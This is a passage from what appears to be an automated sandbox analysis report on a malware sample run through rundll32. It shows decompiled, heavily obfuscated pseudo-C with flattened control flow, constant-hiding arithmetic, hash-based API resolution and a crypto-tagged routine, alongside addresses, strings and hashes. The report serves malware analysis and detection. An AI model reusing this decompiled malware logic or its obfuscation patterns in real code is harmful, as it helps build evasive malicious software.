							if(_t302 == _v88) {
								_t316 = 0xd86d689;
								continue;
							}
						} else {
							if(_t316 == 0xd7ced6e) {
								_t305 =  *0x363dfc; // 0x0
								_t306 = E00355B3B(_t316, _v112,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t305 + 0x64)),  *_t342, _v116, _v40, _v120, _v16,  &_v12, _v12, _v124, _v72, _t316, _v44, _v48, _v76, _v80);
								_t352 =  &(_t352[0x10]);
								if(_t306 == _v108) {
									 *_t314 = _v16;
									_t340 = 1;
									 *((intOrPtr*)(_t314 + 4)) = _v12;
								} else {
									_t316 = 0xf392ab6;
									continue;
								}
							} else {
								if(_t316 == 0xd86d689) {
									_push(_t316);
									_push(_t316);
									_t312 = E00347FF2(_v12);
									_v16 = _t312;
									if(_t312 != 0) {
										_t316 = 0xd7ced6e;
										continue;
									}
								} else {
									if(_t316 != 0xf392ab6) {
										goto L14;
									} else {
										E00358519(_v84, _v20, _v16);
									}
								}
							}
						}
						L17:
						return _t340;
					}
					_t316 = 0x220b753;
					L14:
				} while (_t316 != 0xf4b6a65);
				goto L17;
			}

0x003470bc
0x003470c3
0x003470c6
0x003470cd
0x003470d4
0x003470d5
0x003470d6
0x003470d7
0x003470dc
0x003470e7
0x003470e9
0x003470f0
0x003470f3
0x003470fd
0x00347102
0x00347107
0x0034710f
0x00347117
0x0034711f
0x00347127
0x00347132
0x00347137
0x0034713d
0x00347145
0x0034714d
0x00347159
0x0034715e
0x00347164
0x00347169
0x0034716e
0x00347176
0x00347183
0x00347186
0x0034718a
0x00347198
0x0034719c
0x003471a4
0x003471ac
0x003471b4
0x003471bc
0x003471c1
0x003471c9
0x003471d1
0x003471db
0x003471df
0x003471e4
0x003471ec
0x003471f4
0x003471fc
0x00347201
0x00347206
0x0034720e
0x00347216
0x0034721e
0x00347226
0x0034722e
0x00347233
0x00347238
0x00347240
0x00347248
0x00347256
0x0034725b
0x00347261
0x00347266
0x0034726e
0x0034727b
0x0034727e
0x00347282
0x0034728a
0x00347297
0x0034729b
0x003472a3
0x003472ab
0x003472b3
0x003472b8
0x003472c0
0x003472c8
0x003472cd
0x003472d2
0x003472da
0x003472e2
0x003472ea
0x003472f2
0x003472ff
0x00347303
0x0034730b
0x0034731b
0x0034731f
0x00347327
0x0034732f
0x00347337
0x0034733f
0x00347344
0x0034734c
0x00347354
0x00347359
0x0034735a
0x0034735e
0x00347363
0x0034736b
0x00347373
0x0034737b
0x00347385
0x00347389
0x0034738d
0x00347395
0x0034739d
0x003473a2
0x003473aa
0x003473b2
0x003473b7
0x003473bf
0x003473c7
0x003473cf
0x003473d4
0x003473dc
0x003473ea
0x003473ee
0x003473f6
0x003473fe
0x00347403
0x0034740b
0x00347413
0x0034741b
0x00347420
0x00347428
0x00347430
0x0034743d
0x00347443
0x00347448
0x0034744d
0x00347455
0x00347463
0x0034746b
0x0034746f
0x00347477
0x00347477
0x00347485
0x00347592
0x003475a6
0x003475ab
0x003475b2
0x003475b4
0x00000000
0x003475b4
0x0034748b
0x00347491
0x00347531
0x00347542
0x00347547
0x0034754e
0x003475d7
0x003475d9
0x003475e1
0x00347550
0x00347550
0x00000000
0x00347550
0x00347493
0x00347499
0x003474d4
0x003474d5
0x003474d6
0x003474db
0x003474e6
0x003474ec
0x00000000
0x003474ec
0x0034749b
0x003474a1
0x00000000
0x003474a7
0x003474b6
0x003474bb
0x003474a1
0x00347499
0x00347491
0x003475e4
0x003475f0
0x003475f0
0x003475be
0x003475c0
0x003475c0
0x00000000

Strings

[%L, xrefs: 003472AB
u, xrefs: 00347395
mH, xrefs: 00347354
hJ, xrefs: 003473EE
n|, xrefs: 0034748B
n&, xrefs: 0034720E
n|, xrefs: 003474EC
Y, xrefs: 003471AC

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: [%L$hJ$n&$n|$n|$u$Y$mH
API String ID: 0-2314355462
Opcode ID: 3ea50eb5a96c31f7a7c9e1e8b0d53c5e076b88e195a093a0809439c429c33569
Instruction ID: 7053cf92e8c7ed958a9038d0f6d50cdb80ea38f3b5c051902d78b8e86df57eed
Opcode Fuzzy Hash: 3ea50eb5a96c31f7a7c9e1e8b0d53c5e076b88e195a093a0809439c429c33569
Instruction Fuzzy Hash: 6ED10D7110C3819FC765CF66C88995BFBE2BBC4748F50891DF6A68A220C7B6D949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0035C631 Relevance: 10.2, Strings: 8, Instructions: 218
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0035C631(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* _t214;
				void* _t220;
				void* _t224;
				void* _t228;
				void* _t229;
				void* _t233;
				void* _t234;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				void* _t248;
				void* _t249;
				signed int* _t251;
				void* _t254;

				_t251 =  &_v92;
				_t234 = __ecx;
				_v56 = 0x6c25e6;
				_v56 = _v56 >> 0xf;
				_v56 = _v56 >> 0xd;
				_v56 = _v56 ^ 0x000b07b8;
				_v60 = 0xfeb19f;
				_v60 = _v60 | 0xe5cfed25;
				_v60 = _v60 ^ 0x26a25afc;
				_v60 = _v60 ^ 0xc355f8a5;
				_v20 = 0x71f317;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x003a157d;
				_v64 = 0x229c82;
				_v64 = _v64 >> 6;
				_v64 = _v64 + 0x6845;
				_v64 = _v64 ^ 0x000e1a2d;
				_v80 = 0xaa3c23;
				_v80 = _v80 + 0x9f20;
				_v80 = _v80 + 0x8b23;
				_v80 = _v80 | 0x21cd8be9;
				_v80 = _v80 ^ 0x21ed2977;
				_v84 = 0xa275e1;
				_v84 = _v84 >> 0xd;
				_t248 = 0;
				_t236 = 0x36;
				_v84 = _v84 / _t236;
				_v84 = _v84 | 0x6f301759;
				_t249 = 0xe982267;
				_v84 = _v84 ^ 0x6f339045;
				_v88 = 0x6e61be;
				_v88 = _v88 ^ 0xaf54e0d1;
				_v88 = _v88 >> 4;
				_v88 = _v88 | 0xfa70c1e6;
				_v88 = _v88 ^ 0xfaf0db59;
				_v8 = 0x2c245a;
				_v8 = _v8 << 8;
				_v8 = _v8 ^ 0x2c2bf9b3;
				_v36 = 0xcb696d;
				_v36 = _v36 >> 4;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x019dc7aa;
				_v76 = 0xb5019c;
				_v76 = _v76 + 0xffffd3ce;
				_t237 = 0x3a;
				_v76 = _v76 / _t237;
				_v76 = _v76 + 0xe675;
				_v76 = _v76 ^ 0x000db5c6;
				_v40 = 0x1e681a;
				_t238 = 0x22;
				_v40 = _v40 / _t238;
				_v40 = _v40 + 0x9449;
				_v40 = _v40 ^ 0x00094c29;
				_v12 = 0x15a3d6;
				_v12 = _v12 * 0x6f;
				_v12 = _v12 ^ 0x096cbb26;
				_v44 = 0x420567;
				_v44 = _v44 * 0x2b;
				_v44 = _v44 >> 8;
				_v44 = _v44 ^ 0x0004b329;
				_v24 = 0xd75fdc;
				_v24 = _v24 + 0x1e6b;
				_v24 = _v24 ^ 0x00df7832;
				_v92 = 0x2978f4;
				_v92 = _v92 ^ 0x1aa3462f;
				_v92 = _v92 * 0x3a;
				_v92 = _v92 | 0xa828e589;
				_v92 = _v92 ^ 0xab738ef3;
				_v28 = 0xea47cd;
				_v28 = _v28 * 0x68;
				_v28 = _v28 ^ 0x5f2069e4;
				_v16 = 0x52c32f;
				_v16 = _v16 | 0xda6d254c;
				_v16 = _v16 ^ 0xda7308ab;
				_v48 = 0xc39de2;
				_v48 = _v48 ^ 0x402eeacb;
				_v48 = _v48 + 0xb85a;
				_v48 = _v48 ^ 0x40eaab85;
				_v52 = 0xbb994d;
				_v52 = _v52 | 0x0bb22e40;
				_v52 = _v52 ^ 0x7c36a9dd;
				_v52 = _v52 ^ 0x7782b78d;
				_v68 = 0x6ee7f1;
				_v68 = _v68 * 3;
				_v68 = _v68 * 0x65;
				_v68 = _v68 + 0xffffc283;
				_v68 = _v68 ^ 0x834839c0;
				_v4 = 0x2c076e;
				_v4 = _v4 >> 2;
				_v4 = _v4 ^ 0x00027705;
				_v32 = 0x2be47d;
				_v32 = _v32 >> 3;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0x7c8953c8;
				_v72 = 0x664751;
				_v72 = _v72 + 0xffffb67a;
				_v72 = _v72 + 0xf05a;
				_v72 = _v72 + 0xffff370a;
				_v72 = _v72 ^ 0x0066b29b;
				goto L1;
				do {
					while(1) {
						L1:
						_t254 = _t249 - 0xe145aac;
						if(_t254 > 0) {
							break;
						}
						if(_t254 == 0) {
							_push(_t238);
							_push(_t238);
							_t220 = E0034474B();
							_t251 =  &(_t251[2]);
							_t249 = 0x70e2d06;
							_t248 = _t248 + _t220;
							continue;
						} else {
							if(_t249 == 0x15047ce) {
								_push(_t238);
								_push(_t238);
								_t224 = E0034474B();
								_t251 =  &(_t251[2]);
								_t249 = 0xe32aaf2;
								_t248 = _t248 + _t224;
								continue;
							} else {
								if(_t249 == 0x4d33fe3) {
									_push(_t238);
									_push(_t238);
									_t228 = E0034474B();
									_t251 =  &(_t251[2]);
									_t249 = 0xe45b300;
									_t248 = _t248 + _t228;
									continue;
								} else {
									if(_t249 == 0x708a22e) {
										_t238 = _v56;
										_t229 = E0035C2F8(_t238, _t234 + 0x1c, _v60, _v20, _v64);
										_t251 =  &(_t251[3]);
										_t249 = 0x15047ce;
										_t248 = _t248 + _t229;
										continue;
									} else {
										if(_t249 != 0x70e2d06) {
											goto L17;
										} else {
											_push(_t238);
											_push(_t238);
											_t233 = E0034474B();
											_t251 =  &(_t251[2]);
											_t249 = 0x4d33fe3;
											_t248 = _t248 + _t233;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t248;
					}
					if(_t249 == 0xe32aaf2) {
						_push(_t238);
						_push(_t238);
						_t214 = E0034474B();
						_t251 =  &(_t251[2]);
						_t249 = 0xe145aac;
						_t248 = _t248 + _t214;
						goto L17;
					} else {
						if(_t249 == 0xe45b300) {
							_t248 = _t248 + E0035C2F8(_v68, _t234 + 0x14, _v4, _v32, _v72);
						} else {
							if(_t249 != 0xe982267) {
								goto L17;
							} else {
								_t249 = 0x708a22e;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t249 != 0xce30a1f);
				goto L20;
			}

0x0035c631
0x0035c638
0x0035c63a
0x0035c644
0x0035c649
0x0035c64e
0x0035c656
0x0035c65e
0x0035c666
0x0035c66e
0x0035c676
0x0035c67e
0x0035c682
0x0035c68a
0x0035c692
0x0035c697
0x0035c69f
0x0035c6a7
0x0035c6af
0x0035c6b7
0x0035c6bf
0x0035c6c7
0x0035c6cf
0x0035c6d7
0x0035c6e2
0x0035c6e4
0x0035c6e9
0x0035c6ef
0x0035c6f7
0x0035c6fc
0x0035c704
0x0035c70c
0x0035c714
0x0035c719
0x0035c721
0x0035c729
0x0035c731
0x0035c736
0x0035c73e
0x0035c746
0x0035c74b
0x0035c750
0x0035c758
0x0035c760
0x0035c76c
0x0035c771
0x0035c777
0x0035c77f
0x0035c787
0x0035c793
0x0035c796
0x0035c79a
0x0035c7a2
0x0035c7aa
0x0035c7b7
0x0035c7bb
0x0035c7c3
0x0035c7d0
0x0035c7d4
0x0035c7d9
0x0035c7e1
0x0035c7e9
0x0035c7f1
0x0035c7f9
0x0035c801
0x0035c813
0x0035c817
0x0035c81f
0x0035c827
0x0035c834
0x0035c838
0x0035c840
0x0035c848
0x0035c850
0x0035c858
0x0035c860
0x0035c868
0x0035c870
0x0035c878
0x0035c880
0x0035c888
0x0035c890
0x0035c898
0x0035c8a5
0x0035c8ae
0x0035c8b2
0x0035c8ba
0x0035c8c2
0x0035c8ca
0x0035c8cf
0x0035c8d7
0x0035c8df
0x0035c8e4
0x0035c8e9
0x0035c8f1
0x0035c8f9
0x0035c901
0x0035c909
0x0035c911
0x0035c911
0x0035c919
0x0035c919
0x0035c919
0x0035c919
0x0035c91b
0x00000000
0x00000000
0x0035c921
0x0035c9e2
0x0035c9e3
0x0035c9e4
0x0035c9e9
0x0035c9ec
0x0035c9f1
0x00000000
0x0035c927
0x0035c92d
0x0035c9c0
0x0035c9c1
0x0035c9c2
0x0035c9c7
0x0035c9ca
0x0035c9cf
0x00000000
0x0035c933
0x0035c939
0x0035c99e
0x0035c99f
0x0035c9a0
0x0035c9a5
0x0035c9a8
0x0035c9ad
0x00000000
0x0035c93b
0x0035c941
0x0035c97d
0x0035c981
0x0035c986
0x0035c989
0x0035c98e
0x00000000
0x0035c943
0x0035c949
0x00000000
0x0035c94f
0x0035c95b
0x0035c95c
0x0035c95d
0x0035c962
0x0035c965
0x0035c96a
0x00000000
0x0035c96a
0x0035c949
0x0035c941
0x0035c939
0x0035c92d
0x0035ca5f
0x0035ca68
0x0035ca68
0x0035c9fe
0x0035ca26
0x0035ca27
0x0035ca28
0x0035ca2d
0x0035ca30
0x0035ca32
0x00000000
0x0035ca00
0x0035ca06
0x0035ca5d
0x0035ca08
0x0035ca0e
0x00000000
0x0035ca10
0x0035ca10
0x00000000
0x0035ca10
0x0035ca0e
0x0035ca06
0x00000000
0x0035ca34
0x0035ca34
0x00000000

Strings

w)!, xrefs: 0035C6C7
)L, xrefs: 0035C7A2
}+, xrefs: 0035C8D7
Z$,, xrefs: 0035C729
Eh, xrefs: 0035C697
%l, xrefs: 0035C63A
QGf, xrefs: 0035C8F1
i _, xrefs: 0035C838

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: )L$Eh$QGf$Z$,$w)!$}+$%l$i _
API String ID: 0-1553751006
Opcode ID: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
Instruction ID: 7562a577cc80cb0a95286d335abd59c0b9ccca8b9ab09a0f6b35e81ca1afb657
Opcode Fuzzy Hash: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
Instruction Fuzzy Hash: 9AA141B28183419FC349CF25D48A80FFBE1BB85748F515A1DF995A6220D3B5DA49CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0035F435 Relevance: 9.3, Strings: 7, Instructions: 536
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0035F435(intOrPtr* __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				intOrPtr _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				intOrPtr* _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				void* _t551;
				void* _t554;
				signed int _t560;
				void* _t563;
				int _t566;
				void* _t580;
				signed int* _t582;
				void* _t587;
				signed int _t595;
				void* _t598;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				intOrPtr* _t610;
				signed int _t634;
				void* _t659;
				signed int _t675;
				signed int _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				void* _t682;
				void* _t683;
				void* _t686;
				void* _t687;
				signed int _t692;
				signed int _t693;
				signed int* _t694;
				void* _t698;

				_t694 =  &_v520;
				_v296 = __edx;
				_v456 = __ecx;
				_v308 = 0x7c82e0;
				_v308 = _v308 ^ 0x9529f8b7;
				_v308 = _v308 ^ 0x95557a57;
				_v444 = 0xbd655a;
				_v444 = _v444 + 0x6586;
				_v444 = _v444 + 0xffff1486;
				_v444 = _v444 ^ 0x00b10b5d;
				_v360 = 0x6df28f;
				_v360 = _v360 >> 0xc;
				_v360 = _v360 ^ 0xc93a0f00;
				_v360 = _v360 ^ 0xc93b57a7;
				_v380 = 0x803da4;
				_v380 = _v380 + 0x81b0;
				_v380 = _v380 << 0x10;
				_v380 = _v380 ^ 0xbf59b73f;
				_v484 = 0xdeaf13;
				_v484 = _v484 | 0x05ba16e8;
				_v484 = _v484 + 0xffff5e7b;
				_v484 = _v484 + 0x21a5;
				_v484 = _v484 ^ 0x05f35408;
				_v516 = 0x9c12e3;
				_v516 = _v516 >> 5;
				_v516 = _v516 + 0x3879;
				_t686 = 0x618a3a9;
				_t676 = 0x46;
				_v516 = _v516 / _t676;
				_v516 = _v516 ^ 0x000beb5e;
				_v404 = 0x49e9fe;
				_v404 = _v404 + 0x1375;
				_v404 = _v404 | 0x014362a3;
				_v404 = _v404 ^ 0x01430578;
				_v408 = 0xd49d0c;
				_v408 = _v408 + 0x89ee;
				_v408 = _v408 | 0xbbfa4d8a;
				_v408 = _v408 ^ 0xbbf95772;
				_v504 = 0x33cefe;
				_v504 = _v504 >> 0xa;
				_v504 = _v504 >> 0xd;
				_v504 = _v504 + 0xffff4738;
				_v504 = _v504 ^ 0xfff61340;
				_v388 = 0x38423a;
				_t75 =  &_v388; // 0x38423a
				_t601 = 0x7b;
				_v388 =  *_t75 * 0x2c;
				_v388 = _v388 + 0x7a90;
				_v388 = _v388 ^ 0x09a92ca6;
				_v396 = 0x89c34a;
				_v396 = _v396 >> 6;
				_v396 = _v396 | 0xaa955d3e;
				_v396 = _v396 ^ 0xaa9cf099;
				_v316 = 0x54e1fb;
				_v316 = _v316 + 0xffff88b2;
				_v316 = _v316 ^ 0x0053b1cb;
				_v392 = 0xd67855;
				_v392 = _v392 + 0xd739;
				_v392 = _v392 * 0x34;
				_v392 = _v392 ^ 0x2bb8cf2c;
				_v512 = 0x9dc1ac;
				_v512 = _v512 | 0xff1b5e8c;
				_v512 = _v512 / _t601;
				_v512 = _v512 + 0xc237;
				_v512 = _v512 ^ 0x02115509;
				_v368 = 0xb0c27;
				_v368 = _v368 * 0x3a;
				_v368 = _v368 + 0x9417;
				_v368 = _v368 ^ 0x028ae81d;
				_v352 = 0x7ea940;
				_v352 = _v352 + 0xffff6a40;
				_v352 = _v352 | 0x1d7a7563;
				_v352 = _v352 ^ 0x1d74a207;
				_v340 = 0xd37cb9;
				_v340 = _v340 >> 5;
				_v340 = _v340 ^ 0x00021b7e;
				_v384 = 0xc54f7c;
				_v384 = _v384 | 0xe1c129a4;
				_v384 = _v384 << 6;
				_v384 = _v384 ^ 0x7152788e;
				_v320 = 0xafdf9b;
				_v320 = _v320 | 0x588bef45;
				_v320 = _v320 ^ 0x58ad1127;
				_v508 = 0x7882a6;
				_v508 = _v508 ^ 0x5ae648f7;
				_t677 = 0x7e;
				_v508 = _v508 / _t677;
				_v508 = _v508 + 0xffff266f;
				_v508 = _v508 ^ 0x00b4570c;
				_v344 = 0x25ec7c;
				_t158 =  &_v344; // 0x25ec7c
				_t692 = 0x77;
				_v344 =  *_t158 * 0x48;
				_v344 = _v344 ^ 0x0aab681c;
				_v332 = 0xac456;
				_v332 = _v332 ^ 0x143b2d92;
				_v332 = _v332 ^ 0x1438ce6d;
				_v436 = 0x1dd68;
				_v436 = _v436 + 0x1e14;
				_v436 = _v436 / _t692;
				_v436 = _v436 ^ 0x000407e3;
				_v468 = 0x975814;
				_v468 = _v468 | 0x165c3dad;
				_v468 = _v468 >> 3;
				_v468 = _v468 + 0x9a99;
				_v468 = _v468 ^ 0x02d4af38;
				_v428 = 0xd1fa32;
				_v428 = _v428 + 0x34cd;
				_v428 = _v428 >> 0xa;
				_v428 = _v428 ^ 0x000c7c43;
				_v372 = 0xb93604;
				_v372 = _v372 >> 0xb;
				_v372 = _v372 + 0x569f;
				_v372 = _v372 ^ 0x0001c97c;
				_v312 = 0xb8b780;
				_v312 = _v312 / _t601;
				_v312 = _v312 ^ 0x0009bb57;
				_v364 = 0xc6b8c5;
				_v364 = _v364 >> 4;
				_v364 = _v364 << 0xf;
				_v364 = _v364 ^ 0x35c8234d;
				_v500 = 0x5d2db3;
				_v500 = _v500 | 0xa4ec7bca;
				_v500 = _v500 * 0x42;
				_v500 = _v500 + 0xffff6871;
				_v500 = _v500 ^ 0x8955fb09;
				_v492 = 0xf8ac1c;
				_v492 = _v492 + 0xd489;
				_v492 = _v492 | 0x938b5662;
				_v492 = _v492 << 6;
				_v492 = _v492 ^ 0xfef6fac0;
				_v356 = 0x80a8a7;
				_v356 = _v356 >> 3;
				_v356 = _v356 + 0xffff1aa9;
				_v356 = _v356 ^ 0x00023cc5;
				_v420 = 0x29f504;
				_v420 = _v420 ^ 0x96d25191;
				_v420 = _v420 << 0xa;
				_v420 = _v420 ^ 0xee96722c;
				_v476 = 0x6526e6;
				_t250 =  &_v476; // 0x6526e6
				_t602 = 9;
				_t678 = 0x5e;
				_v476 =  *_t250 * 0x65;
				_t252 =  &_v476; // 0x6526e6
				_v476 =  *_t252 * 0x5d;
				_v476 = _v476 + 0xffffa50d;
				_v476 = _v476 ^ 0x7f6d4504;
				_v304 = 0x6f90;
				_v304 = _v304 + 0xffffb625;
				_v304 = _v304 ^ 0x0000ce69;
				_v348 = 0xd48165;
				_v348 = _v348 * 0x4f;
				_v348 = _v348 + 0xa298;
				_v348 = _v348 ^ 0x41980148;
				_v412 = 0x7e685b;
				_t271 =  &_v412; // 0x7e685b
				_v412 =  *_t271 * 0x1d;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 ^ 0x000f1110;
				_v460 = 0xd80dae;
				_v460 = _v460 * 0x4a;
				_v460 = _v460 << 9;
				_v460 = _v460 >> 5;
				_v460 = _v460 ^ 0x073a202e;
				_v324 = 0x2acd4f;
				_v324 = _v324 ^ 0x1744d618;
				_v324 = _v324 ^ 0x1766082c;
				_v400 = 0xe6723b;
				_v400 = _v400 ^ 0x220d80d9;
				_v400 = _v400 ^ 0x0161a8c1;
				_v400 = _v400 ^ 0x238d1a3c;
				_v376 = 0xaaa6;
				_v376 = _v376 + 0xd31a;
				_v376 = _v376 + 0xfffff53b;
				_v376 = _v376 ^ 0x00079406;
				_v452 = 0xe6cc76;
				_v452 = _v452 ^ 0xa4c29e28;
				_v452 = _v452 / _t602;
				_v452 = _v452 ^ 0x123fe3c8;
				_v520 = 0x822cac;
				_v520 = _v520 / _t678;
				_v520 = _v520 << 4;
				_v520 = _v520 << 9;
				_v520 = _v520 ^ 0x2c5f9d39;
				_v440 = 0xafb195;
				_v440 = _v440 + 0xffff123a;
				_v440 = _v440 >> 0xa;
				_v440 = _v440 ^ 0x0003dc41;
				_v448 = 0xdf86e4;
				_v448 = _v448 ^ 0xac60bb5d;
				_v448 = _v448 ^ 0x5238faed;
				_v448 = _v448 ^ 0xfe8be764;
				_v336 = 0x3e14c9;
				_v336 = _v336 << 7;
				_v336 = _v336 ^ 0x1f0fc953;
				_v496 = 0x4885f3;
				_v496 = _v496 * 0x25;
				_v496 = _v496 + 0x3aa8;
				_v496 = _v496 + 0xffff73aa;
				_v496 = _v496 ^ 0x0a7b30ee;
				_v480 = 0xca6b34;
				_v480 = _v480 >> 9;
				_v480 = _v480 + 0xfb6a;
				_v480 = _v480 / _t692;
				_v480 = _v480 ^ 0x000164ed;
				_v432 = 0xb19133;
				_t679 = 0x63;
				_t693 = _v296;
				_v432 = _v432 * 0x53;
				_v432 = _v432 >> 0x10;
				_v432 = _v432 ^ 0x00018cb4;
				_v328 = 0xdb466c;
				_t603 = _v296;
				_v328 = _v328 / _t679;
				_v328 = _v328 ^ 0x000e2190;
				_v488 = 0xd48740;
				_t680 = 0x44;
				_v488 = _v488 * 7;
				_v488 = _v488 * 0x66;
				_v488 = _v488 + 0x34f;
				_v488 = _v488 ^ 0x50c19e73;
				_v424 = 0xacfab2;
				_v424 = _v424 / _t680;
				_v424 = _v424 | 0xedf008b5;
				_v424 = _v424 ^ 0xedf22909;
				_v472 = 0x2e74a8;
				_v472 = _v472 * 0x3f;
				_v472 = _v472 ^ 0x6424471f;
				_v472 = _v472 >> 0xb;
				_v472 = _v472 ^ 0x0009d0c0;
				_v416 = 0x7e19d4;
				_v416 = _v416 << 0xd;
				_v416 = _v416 + 0x1081;
				_v416 = _v416 ^ 0xc3344569;
				_v464 = 0xa74bb7;
				_v464 = _v464 >> 0xb;
				_v464 = _v464 + 0x9c4;
				_v464 = _v464 >> 6;
				_v464 = _v464 ^ 0x000976a8;
				while(1) {
					L1:
					_t551 = 0xf168e34;
					do {
						while(1) {
							L2:
							_t698 = _t686 - 0x7498ebf;
							if(_t698 > 0) {
								break;
							}
							if(_t698 == 0) {
								_push(_v496);
								_push(_v336);
								_push(_v448);
								_t580 = E00347F1D(_v480, _t603, _v432, E00358606(_v440, 0x341560, __eflags), _v328, _v292 - _t603, _v488);
								E0034A8B0(_v424, _t577, _v472);
								_t582 = _v296;
								 *_t582 = _t693;
								_t582[1] = _t603 + _t580 - _t693;
								goto L29;
							}
							if(_t686 == 0x488924) {
								_t682 = _t682 +  *((intOrPtr*)(_t610 + 4));
								_push(_t610);
								_push(_t610);
								_t693 = E00347FF2(_t682);
								__eflags = _t693;
								_t551 = 0xf168e34;
								_t610 = _v456;
								_t686 =  !=  ? 0xf168e34 : 0xe639f63;
								continue;
							}
							if(_t686 == 0x123a276) {
								_push(_v468);
								_push(_v436);
								_t587 = E0035DCF7(_v332, 0x3415c0, __eflags);
								_push( &_v256);
								_push(_t587);
								_push(_t682);
								_push(_v300);
								 *((intOrPtr*)(E0034A42D(0xab2a8d8a, 0x2b7)))();
								E0034A8B0(_v428, _t587, _v372);
								_t694 =  &(_t694[5]);
								_t686 = 0x488924;
								L12:
								_t610 = _v456;
								while(1) {
									L1:
									_t551 = 0xf168e34;
									goto L2;
								}
							}
							if(_t686 != 0x57ff6e7) {
								if(_t686 == 0x5f676f3) {
									_t598 = E00350AE0(8, 1);
									_push(_v516);
									_t682 = _t598;
									_push( &_v288);
									_push(_t682);
									_push(9);
									E003480E3(_v380, _v484);
									_t686 = 0x7f96e60;
									L11:
									_t694 =  &(_t694[6]);
									goto L12;
								} else {
									if(_t686 != 0x618a3a9) {
										goto L28;
									} else {
										_t686 = 0x5f676f3;
										continue;
									}
								}
								L30:
								return _t595;
							}
							_t682 = 0x4000;
							_push(_t610);
							_push(_t610);
							_t595 = E00347FF2(0x4000);
							_v300 = _t595;
							__eflags = _t595;
							if(__eflags != 0) {
								_t686 = 0x123a276;
								goto L12;
							}
							goto L30;
						}
						__eflags = _t686 - 0x7f96e60;
						if(_t686 == 0x7f96e60) {
							_t554 = E00350AE0(0x10, 4);
							_push(_v396);
							_t682 = _t554;
							_push( &_v128);
							_push(_t682);
							_push(0xb);
							E003480E3(_v504, _v388);
							_t610 = _v456;
							_t694 =  &(_t694[6]);
							_t686 = 0x8d9b717;
							_t551 = 0xf168e34;
							goto L28;
						} else {
							__eflags = _t686 - 0x8d9b717;
							if(_t686 == 0x8d9b717) {
								_t687 =  &_v256;
								_t659 = E00350AE0(0x10, 8);
								_t560 = _v308;
								__eflags = _t560 - _t659;
								if(_t560 < _t659) {
									_t675 = _t659 - _t560;
									_t683 = _t687;
									_t634 = _t675 >> 1;
									__eflags = _t634;
									_t566 = memset(_t683, 0x2d002d, _t634 << 2);
									asm("adc ecx, ecx");
									_t687 = _t687 + _t675 * 2;
									memset(_t683 + _t634, _t566, 0);
									_t694 =  &(_t694[6]);
								}
								_t563 = E00350AE0(0x10, 8);
								_push(_v384);
								_t682 = _t563;
								_push(_t687);
								_push(_t682);
								_push(0xb);
								E003480E3(_v352, _v340);
								_t686 = 0x57ff6e7;
								goto L11;
							} else {
								__eflags = _t686 - 0xa9d081a;
								if(_t686 == 0xa9d081a) {
									E0034ED7E(_v452, _t603, _v520,  *_t610,  *((intOrPtr*)(_t610 + 4)));
									_t610 = _v456;
									_t694 =  &(_t694[3]);
									_t686 = 0x7498ebf;
									_t603 = _t603 +  *((intOrPtr*)(_t610 + 4));
									goto L1;
								} else {
									__eflags = _t686 - 0xe639f63;
									if(_t686 == 0xe639f63) {
										E00358519(_v416, _v464, _v300);
										return 0;
									}
									__eflags = _t686 - _t551;
									if(__eflags != 0) {
										goto L28;
									} else {
										_push(_v476);
										_push(_v420);
										_v292 = _t682 + _t693;
